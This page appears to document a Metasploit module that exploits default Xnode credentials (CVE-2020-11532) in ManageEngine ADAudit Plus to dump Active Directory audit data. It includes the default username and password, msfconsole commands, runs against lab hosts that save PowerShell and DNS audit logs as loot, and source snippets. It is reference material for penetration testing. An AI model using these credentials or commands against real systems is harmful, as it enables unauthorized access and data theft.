ManageEngine ADAudit Plus Xnode Enumeration - Metasploit


This page contains detailed information about how to use the auxiliary/gather/manageengine_adaudit_plus_xnode_enum metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: ManageEngine ADAudit Plus Xnode Enumeration
Module: auxiliary/gather/manageengine_adaudit_plus_xnode_enum
Source code: modules/auxiliary/gather/manageengine_adaudit_plus_xnode_enum.rb
Disclosure date: -
Last modification time: 2022-08-24 16:15:11 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 29118
List of CVEs: CVE-2020-11532

This module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order to dump the contents of Xnode data repositories (tables), which may contain (a limited amount of) Active Directory information including domain names, host names, usernames and SIDs. This module can also be used against patched ADAudit Plus versions if the correct credentials are provided. By default, this module dumps only the data repositories and fields (columns) specified in the configuration file (set via the CONFIG_FILE option). The configuration file is also used to add labels to the values sent by Xnode in response to a query. It is also possible to use the DUMP_ALL option to obtain all data in all known data repositories without specifying data field names. However, note that when using the DUMP_ALL option, the data won't be labeled. This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > show targets
    ... a list of targets ...
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > set TARGET target-id
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > show options
    ... show and set options ...
msf auxiliary(manageengine_adaudit_plus_xnode_enum) > exploit

Required Options

  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base

Vulnerable Application

The module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order to dump the contents of Xnode data repositories (tables), which may contain varying amounts of Active Directory information including domain names, host names, usernames and SIDs. The module can also be used against patched ADAudit Plus versions if the correct credentials are provided.

The module's check method attempts to authenticate to the remote Xnode server. The default credentials are atom:chegan. If the credentials are valid, the module will perform a few requests to the Xnode server to obtain information like the Xnode version. This is mostly done as a sanity check to ensure the Xnode server is working as expected.

Next, the module will iterate over a list of known Xnode data repositories and perform several requests for each in order to: - Check if the data repository is configured on the target - Obtain the total number of records in the data repository - Obtain both the lowest and the highest value for the ID field (column). These values will be used to determine the range of possible records to be queried.

If a given data repository exists, the module uses the above information to dump the data repository contents. The maximum number of records returned for a search query is 10. To overcome this, the module performs series of requests using the dr:/dr_search action, while specifying the ID values for each record. For example, if the lowest observed ID value is 15 and the highest is 41, the module will perform three requests: 1. A request for the records with ID values 15 to 24 2. A request for the records with ID values 25 to 34 3. A request for the records with ID values 35 to 41 Empty records are ignored.

To view the raw Xnode requests and responses, enter set VERBOSE true before running the module.

By default, the module dumps only the data repositories (tables) and fields (columns) specified in the configuration file. The configuration file can be set via the CONFIG_FILE option, but this is not required because a default config file exists at data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml that will be used if CONFIG_FILE is not set.

The configuration file is also used to add labels to the values sent by Xnode in response to a query. This means that for every value in the Xnode response, the module will add the corresponding field name to the results before writing those to a JSON file in ~/.msf4/loot.

It is also possible to use the DUMP_ALL option to obtain all data in all known data repositories without specifying data field names. However, note that when using this option the data won't be labeled.

This module has been successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076) running on Windows Server 2019.

Installation Information

Vulnerable versions of ADAudit Plus are available here. All versions from 6000 through 6031 are configured with default Xnode credentials. Note that testing against vulnerable versions from the archives will make data enumeration impossible because the free trials for those versions do not seem to allow ADAudit Plus to actually start collecting data that can then be accessed via Xnode.

However, apart from some configuration changes, Xnode functions the same way on patched versions as it does on vulnerable versions, so it is possible to test the modules against patched versions as long as the correct credentials are provided.

A free 30-day trial of the latest version of ADAudit Plus can be downloaded here. To install, just run the .exe and follow the instructions.

In order to configure a patched ManageEngine ADAudit Plus instance for testing, follow these steps: - Open the Xnode config file at <install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf - Note down the username and password - Insert the following line: xnode.connector.accept_remote_request = true To launch ADAudit Plus, run Command Prompt as administrator and run: <install_dir>\bin\run.bat

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
  3. Do: set RHOSTS [IP]
  4. Do: run

Options

CONFIG_FILE

YAML File specifying the data repositories (tables) and fields (columns) to dump.

DUMP_ALL

Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.

Scenarios

ManageEngine ADAudit Plus 6.0.3 (6031) running on Windows Server 2012 R2

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options

Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):

   Name         Current Setting                                                Required  Description
   ----         ---------------                                                --------  -----------
   CONFIG_FILE  /home/wynter/dev/metasploit-framework/data/exploits/manageeng  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
                ine_xnode/CVE-2020-11532/adaudit_plus_xnode_conf.yaml
   DUMP_ALL     false                                                          no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
   PASSWORD     chegan                                                         yes       Password used to authenticate to the Xnode server
   RHOSTS       192.168.1.41                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        29118                                                          yes       The target port (TCP)
   USERNAME     atom                                                           yes       Username used to authenticate to the Xnode server

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run
[*] Running module against 192.168.1.41

[*] 192.168.1.41:29118 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.1.41:29118 - Target seems to be Xnode.
[+] 192.168.1.41:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
[*] 192.168.1.41:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
[*] 192.168.1.41:29118 - Target is running Xnode version: "XNODE_1_0_0".
[*] 192.168.1.41:29118 - Obtained Xnode installation path: "C:\Program Files (x86)\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
[*] 192.168.1.41:29118 - Data repository AdapFileAuditLog is empty.
[*] 192.168.1.41:29118 - The data repository AdapPowershellAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapSysMonAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapDNSAuditLog is not available on the target.
[*] 192.168.1.41:29118 - The data repository AdapADReplicationAuditLog is not available on the target.
[*] Auxiliary module execution completed

ManageEngine ADAudit Plus 6.0.7 (6076) running on Windows Server 2019 (custom password)

msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set rhosts 192.168.1.25
rhosts => 192.168.1.25
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > set password custom_password
password => custom_password
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > options 

Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):

   Name         Current Setting                                                                                                 Required  Description
   ----         ---------------                                                                                                 --------  -----------
   CONFIG_FILE  /root/github/manageengine/metasploit-framework/data/exploits/manageengine_xnode/CVE-2020-11532/adaudit_plus_xn  no        YAML file specifying the data repositories (tables) and fields (columns) to dump
                ode_conf.yaml
   DUMP_ALL     false                                                                                                           no        Dump all data from the available data repositories (tables). If true, CONFIG_FILE will be ignored.
   PASSWORD     custom_password                                                                                                 yes       Password used to authenticate to the Xnode server
   RHOSTS       192.168.1.25                                                                                                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        29118                                                                                                           yes       The target port (TCP)
   USERNAME     atom                                                                                                            yes       Username used to authenticate to the Xnode server

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > run

[*] Running module against 192.168.1.25

[*] 192.168.1.25:29118 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.1.25:29118 - The target appears to be vulnerable. Successfully authenticated to the Xnode server.
[*] 192.168.1.25:29118 - Obtained expected Xnode "de_healh" status: "GREEN".
[*] 192.168.1.25:29118 - Target is running Xnode version: "DataEngine-XNode 1.1.0 (1100)".
[*] 192.168.1.25:29118 - Obtained Xnode installation path: "C:\Program Files\ManageEngine\ADAudit Plus\apps\dataengine-xnode".
[*] 192.168.1.25:29118 - Data repository AdapFileAuditLog is empty.
[+] 192.168.1.25:29118 - Data repository AdapPowershellAuditLog contains 261 records with ID numbers between 1.0 and 303.0.
[*] 192.168.1.25:29118 - Data repository AdapSysMonAuditLog is empty.
[+] 192.168.1.25:29118 - Data repository AdapDNSAuditLog contains 722 records with ID numbers between 1.0 and 926.0.
[*] 192.168.1.25:29118 - Data repository AdapADReplicationAuditLog is empty.
[*] 192.168.1.25:29118 - Attempting to request 261 records for data repository AdapPowershellAuditLog between IDs 1 and 303. This could take a while...
[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 303...
[+] 192.168.1.25:29118 - Saving 261 records from the AdapPowershellAuditLog data repository to /root/.msf4/loot/20220610073738_default_192.168.1.25_xnode_powershell_099421.json
[*] 192.168.1.25:29118 - Attempting to request 722 records for data repository AdapDNSAuditLog between IDs 1 and 926. This could take a while...
[*] 192.168.1.25:29118 - Processed 25 queries (max 10 records per query) so far. The last queried record ID was 250. The max ID is 926...
[*] 192.168.1.25:29118 - Processed 50 queries (max 10 records per query) so far. The last queried record ID was 500. The max ID is 926...
[*] 192.168.1.25:29118 - Processed 75 queries (max 10 records per query) so far. The last queried record ID was 750. The max ID is 926...
[+] 192.168.1.25:29118 - Saving 722 records from the AdapDNSAuditLog data repository to /root/.msf4/loot/20220610073754_default_192.168.1.25_xnode_dnsaudit_775121.json
[*] Auxiliary module execution completed
msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) >

Go back to menu.

Msfconsole Usage

Here is how the gather/manageengine_adaudit_plus_xnode_enum auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/manageengine_adaudit_plus_xnode_enum

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show info

       Name: ManageEngine ADAudit Plus Xnode Enumeration
     Module: auxiliary/gather/manageengine_adaudit_plus_xnode_enum
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Sahil Dhar
  Erik Wynter

Check supported:
  Yes

Basic options:
  Name         Current Setting                             Required  Description
  ----         ---------------                             --------  -----------
  CONFIG_FILE  /opt/metasploit-framework/embedded/framewo  no        YAML file specifying the data repositories (tables) and fields (columns) to
               rk/data/exploits/manageengine_xnode/CVE-20            dump
               20-11532/adaudit_plus_xnode_conf.yaml
  DUMP_ALL     false                                       no        Dump all data from the available data repositories (tables). If true, CONFIG
                                                                     _FILE will be ignored.
  PASSWORD     chegan                                      yes       Password used to authenticate to the Xnode server
  RHOSTS                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
                                                                     Using-Metasploit
  RPORT        29118                                       yes       The target port (TCP)
  USERNAME     atom                                        yes       Username used to authenticate to the Xnode server

Description:
  This module exploits default admin credentials for the DataEngine 
  Xnode server in ADAudit Plus versions prior to 6.0.3 (6032) in order 
  to dump the contents of Xnode data repositories (tables), which may 
  contain (a limited amount of) Active Directory information including 
  domain names, host names, usernames and SIDs. This module can also 
  be used against patched ADAudit Plus versions if the correct 
  credentials are provided. By default, this module dumps only the 
  data repositories and fields (columns) specified in the 
  configuration file (set via the CONFIG_FILE option). The 
  configuration file is also used to add labels to the values sent by 
  Xnode in response to a query. It is also possible to use the 
  DUMP_ALL option to obtain all data in all known data repositories 
  without specifying data field names. However, note that when using 
  the DUMP_ALL option, the data won't be labeled. This module has been 
  successfully tested against ManageEngine ADAudit Plus 6.0.3 (6031) 
  running on Windows Server 2012 R2 and ADAudit Plus 6.0.7 (6076) 
  running on Windows Server 2019.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-11532
  https://packetstormsecurity.com/files/157609

Module Options

This is a complete list of options available in the gather/manageengine_adaudit_plus_xnode_enum auxiliary module:

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show options

Module options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):

   Name         Current Setting                            Required  Description
   ----         ---------------                            --------  -----------
   CONFIG_FILE  /opt/metasploit-framework/embedded/framew  no        YAML file specifying the data repositories (tables) and fields (columns) to
                ork/data/exploits/manageengine_xnode/CVE-            dump
                2020-11532/adaudit_plus_xnode_conf.yaml
   DUMP_ALL     false                                      no        Dump all data from the available data repositories (tables). If true, CONFIG
                                                                     _FILE will be ignored.
   PASSWORD     chegan                                     yes       Password used to authenticate to the Xnode server
   RHOSTS                                                  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/
                                                                     Using-Metasploit
   RPORT        29118                                      yes       The target port (TCP)
   USERNAME     atom                                       yes       Username used to authenticate to the Xnode server

Advanced Options

Here is a complete list of advanced options supported by the gather/manageengine_adaudit_plus_xnode_enum auxiliary module:

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show advanced

Module advanced options (auxiliary/gather/manageengine_adaudit_plus_xnode_enum):

   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   AutoCheck                true             no        Run check before exploit
   CHOST                                     no        The local client address
   CPORT                                     no        The local client port
   ConnectTimeout           10               yes       Maximum number of seconds to establish a TCP connection
   ForceExploit             false            no        Override check result
   Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                 no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLServerNameIndication                   no        SSL/TLS Server Name Indication (SNI)
   SSLVerifyMode            PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion               Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept
                                                       ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                  false            no        Enable detailed status messages
   WORKSPACE                                 no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the gather/manageengine_adaudit_plus_xnode_enum module can do:

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the gather/manageengine_adaudit_plus_xnode_enum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/manageengine_adaudit_plus_xnode_enum) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

An unexpected error occurred whilst running this module. Please raise a bug ticket!

Here is a relevant code snippet related to the "An unexpected error occurred whilst running this module. Please raise a bug ticket!" error message:

84:	    when 1
85:	      return Exploit::CheckCode::Safe(res_msg)
86:	    when 2
87:	      return Exploit::CheckCode::Unknown(res_msg)
88:	    else
89:	      return Exploit::CheckCode::Unknown('An unexpected error occurred whilst running this module. Please raise a bug ticket!')
90:	    end
91:	  end
92:	
93:	  def run
94:	    # check if we already have a socket, if not, create one

Obtained unexpected Xnode "de_health" status: "<VALUE>"

Here is a relevant code snippet related to the "Obtained unexpected Xnode "de_health" status: "<VALUE>"" error message:

107:	
108:	    if res_code == 0
109:	      if res_health['response']['de_health'] == 'GREEN'
110:	        print_status('Obtained expected Xnode "de_health" status: "GREEN".')
111:	      else
112:	        print_warning("Obtained unexpected Xnode \"de_health\" status: \"#{res_health['response']['de_health']}\"")
113:	      end
114:	    end
115:	
116:	    # get the Xnode info
117:	    info_warning_message = 'Received unexpected response while trying to obtain the Xnode version and installation path via the "xnode_info" action. Enumeration may not work.'

Failed to obtain the Xnode version.

Here is a relevant code snippet related to the "Failed to obtain the Xnode version." error message:

119:	
120:	    if res_code == 0
121:	      if res_info['response'].keys.include?('xnode_version')
122:	        print_status("Target is running Xnode version: \"#{res_info['response']['xnode_version']}\".")
123:	      else
124:	        print_warning('Failed to obtain the Xnode version.')
125:	      end
126:	
127:	      if res_info['response'].keys.include?('xnode_installation_path')
128:	        print_status("Obtained Xnode installation path: \"#{res_info['response']['xnode_installation_path']}\".")
129:	      else

Failed to obtain the Xnode installation path.

Here is a relevant code snippet related to the "Failed to obtain the Xnode installation path." error message:

125:	      end
126:	
127:	      if res_info['response'].keys.include?('xnode_installation_path')
128:	        print_status("Obtained Xnode installation path: \"#{res_info['response']['xnode_installation_path']}\".")
129:	      else
130:	        print_warning('Failed to obtain the Xnode installation path.')
131:	      end
132:	    end
133:	
134:	    # obtain the total number of records and the min and max record ID numbers for each repo, which is necessary to enumerate the records
135:	    repo_record_info_hash = {}

None of the repositories specified contained any data!

Here is a relevant code snippet related to the "None of the repositories specified contained any data!" error message:

169:	      }
170:	    end
171:	
172:	    # check if we found any repositories that contained any data
173:	    if repo_record_info_hash.empty?
174:	      print_error('None of the repositories specified contained any data!')
175:	      return
176:	    end
177:	
178:	    if dump_all
179:	      data_to_dump = ad_audit_plus_data_repos

Unable to obtain the Xnode data repositories to target from <CONFIG_FILE> because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.

Here is a relevant code snippet related to the "Unable to obtain the Xnode data repositories to target from <CONFIG_FILE> because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true." error message:

180:	    else
181:	      data_to_dump = grab_config(config_file)
182:	
183:	      case data_to_dump
184:	      when config_status::CONFIG_FILE_DOES_NOT_EXIST
185:	        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
186:	      when config_status::CANNOT_READ_CONFIG_FILE
187:	        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
188:	      when config_status::DATA_TO_DUMP_EMPTY
189:	        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
190:	      when config_status::DATA_TO_DUMP_WRONG_FORMAT

Unable to read <CONFIG_FILE>. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.

Here is a relevant code snippet related to the "Unable to read <CONFIG_FILE>. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted." error message:

182:	
183:	      case data_to_dump
184:	      when config_status::CONFIG_FILE_DOES_NOT_EXIST
185:	        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
186:	      when config_status::CANNOT_READ_CONFIG_FILE
187:	        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
188:	      when config_status::DATA_TO_DUMP_EMPTY
189:	        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
190:	      when config_status::DATA_TO_DUMP_WRONG_FORMAT
191:	        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
192:	      end

The <CONFIG_FILE> does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.

Here is a relevant code snippet related to the "The <CONFIG_FILE> does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true." error message:

184:	      when config_status::CONFIG_FILE_DOES_NOT_EXIST
185:	        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
186:	      when config_status::CANNOT_READ_CONFIG_FILE
187:	        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
188:	      when config_status::DATA_TO_DUMP_EMPTY
189:	        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
190:	      when config_status::DATA_TO_DUMP_WRONG_FORMAT
191:	        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
192:	      end
193:	    end
194:

Unable to obtain the Xnode data repositories to target from <CONFIG_FILE>. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.

Here is a relevant code snippet related to the "Unable to obtain the Xnode data repositories to target from <CONFIG_FILE>. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true." error message:

186:	      when config_status::CANNOT_READ_CONFIG_FILE
187:	        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
188:	      when config_status::DATA_TO_DUMP_EMPTY
189:	        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
190:	      when config_status::DATA_TO_DUMP_WRONG_FORMAT
191:	        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. The file doesn't appear to contain valid data. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
192:	      end
193:	    end
194:	
195:	    # try and dump the database tables Xnode has access to
196:	    data_to_dump.each do |repo, fields|

Unable to obtain any fields for the data repository <REPO> to query. Skipping this table. Check your config file for this module if this is unintended behavior.

Here is a relevant code snippet related to the "Unable to obtain any fields for the data repository <REPO> to query. Skipping this table. Check your config file for this module if this is unintended behavior." error message:

193:	    end
194:	
195:	    # try and dump the database tables Xnode has access to
196:	    data_to_dump.each do |repo, fields|
197:	      if fields.blank? && !dump_all
198:	        print_error("Unable to obtain any fields for the data repository #{repo} to query. Skipping this table. Check your config file for this module if this is unintended behavior.")
199:	        next
200:	      end
201:	
202:	      # check if we actually found any records for the repo
203:	      next unless repo_record_info_hash.include?(repo)

Unable to obtain the necessary fields for <REPO> from the repo_record_info_hash!

Here is a relevant code snippet related to the "Unable to obtain the necessary fields for <REPO> from the repo_record_info_hash!" error message:

205:	      total_hits = repo_record_info_hash[repo]['total_hits']
206:	      id_range_lower = repo_record_info_hash[repo]['aggr_min']
207:	      max_id = repo_record_info_hash[repo]['aggr_max']
208:	
209:	      if total_hits.nil? || id_range_lower.nil? || max_id.nil?
210:	        print_error("Unable to obtain the necessary fields for #{repo} from the repo_record_info_hash!")
211:	        next
212:	      end
213:	
214:	      if total_hits == 0
215:	        print_error("No hits found for #{repo}!")

No hits found for <REPO>!

Here is a relevant code snippet related to the "No hits found for <REPO>!" error message:

210:	        print_error("Unable to obtain the necessary fields for #{repo} from the repo_record_info_hash!")
211:	        next
212:	      end
213:	
214:	      if total_hits == 0
215:	        print_error("No hits found for #{repo}!")
216:	        next
217:	      end
218:	
219:	      id_range_upper = id_range_lower + 9
220:	      query_ct = 0

No non-empty records were obtained for <REPO>.

Here is a relevant code snippet related to the "No non-empty records were obtained for <REPO>." error message:

247:	          end
248:	        end
249:	      end
250:	
251:	      if results.empty?
252:	        print_error("No non-empty records were obtained for #{repo}.")
253:	        next
254:	      end
255:	
256:	      # shorten the data repository name (if necessary) so that it can be used as part of the eventual output file name
257:	      outfile_part = "xnode_#{repo.gsub('Adap', '').gsub('AuditLog', 'audit').gsub('ADReplication', 'ADRepl').downcase}"

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Sahil Dhar
  • Erik Wynter

Version

This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.